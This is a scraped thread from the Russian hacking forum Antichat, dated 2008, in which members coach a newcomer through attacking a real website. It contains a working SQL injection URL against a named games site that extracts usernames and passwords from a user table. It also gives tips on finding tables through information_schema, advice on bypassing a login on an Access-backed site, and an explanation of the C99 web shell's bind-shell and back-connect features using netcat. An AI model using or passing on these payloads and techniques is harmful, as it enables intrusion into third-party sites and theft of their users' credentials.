Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.11.2008, 23:58
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
|
|
|
20.11.2008, 00:03
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Sindicat
Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name
И зачем чарить в конце? Захекси =)
Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =)
Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно...
Без обид, я немного выпил "за сегодняшний удачный день!" =)
|
|
|
|
20.11.2008, 00:06
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
ThreeD абсолютно прав, мне было не лень )
http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,use rpass),5,6,7+from+d8242sd5804.poll_user--
|
|
|
|
20.11.2008, 00:24
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624
Репутация:
10
|
|
спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?
|
|
|
|
20.11.2008, 00:28
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Sindicat
Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user.
В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+inf ormation_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.
Последний раз редактировалось ThreeD; 20.11.2008 в 00:31..
|
|
|
|
20.11.2008, 00:39
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
но не получается. Как правильно ввести данные? |
|
|
|
20.11.2008, 00:42
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Народ объясните что такое в шелле C99 в тулс.....
Binding port
Back connection
Datapipe
ЧТО ЭТО ВООБЩЕ ТАКОЕ??? если можно то каждую функцию отдельно объясните
|
|
|
|
20.11.2008, 00:46
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Биндшелл, это когда открывается порт на машине.Binding port.
Бэкконект рулит когда тачка за натом, к твоей тачке коннектит, а ты на свой врубаешь неткат и слушаешь порт, на который должен быть коннект. Хотя я могу ошибаться, но вроде таг =) *пошёл за пивом* ))))
|
|
|
|
20.11.2008, 00:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Ershik
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
но не получается. Как правильно ввести данные?
Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью
https://forum.antichat.net/threadnav50550-1-10.html
|
|
|
|
20.11.2008, 00:48
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
diznt
ЭЭЭ. Ёпта, там датапайп исчо...
Вроде он перебрасывает tcp/ip пакеты на другой хост, любой. Для анонимности типа.
Последний раз редактировалось ThreeD; 20.11.2008 в 00:51..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
